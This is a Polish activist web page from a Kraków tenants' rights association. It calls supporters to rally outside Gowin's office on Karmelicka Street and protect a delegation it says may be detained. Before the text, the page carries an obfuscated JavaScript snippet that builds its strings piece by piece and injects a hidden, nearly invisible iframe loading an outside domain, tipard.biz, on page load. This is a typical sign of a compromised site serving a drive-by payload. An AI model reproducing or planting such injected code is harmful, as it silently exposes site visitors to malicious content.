jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); POMOC STRAJKUJĄCYM

Pomocy!!!
Strajkujący pod krakowskimi sądami proszą o wsparcie!

http://poloniae.nowyekran.pl/post/77643,gowin-zamyka-dr-zbigniewa-kekusia-do-psychiatryka

W poniedziałek 29 października na godz. 11, pod biurem Gowina Karmelicka 1/3 (obok Rossmana) trzeba zrobić jak największy tłum. Na ten dzień wyznaczony został przez Gowina termin dostarczenia przez poszkodowanych przez krakowskie sądy i urzędy posiadanej dokumentacji (pism, pozwów, wyroków, decyzji, itd.) . Na zaproszenie Gowina ma tam iść 4-ozobowa delegacja, która przedstawi dokumenty i sprawy. Niestety, kroi się akcja - prowokacja. Są zapędy, żeby zamknąć do psychiatryka dr Zbigniewa Kękusia, a także prawdopodobnie innych wyznaczonych członków delegacji społecznej (mogą ich chcieć zgarnąć po wyjściu od Gowina). Pomóżcie zrobić duże zgromadzenie na Karmelickiej 1, które w razie ataku na delegację społeczną będzie jej bronić przed "służbami" .Zgromadzenie musi stać co kawałek pod kamienicą oraz po drugiej stronie ulicy (pod Teatrem Bagatela i na przystankach) w niewielkich(mniej niż 15 osobowych grupkach).

 

 

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.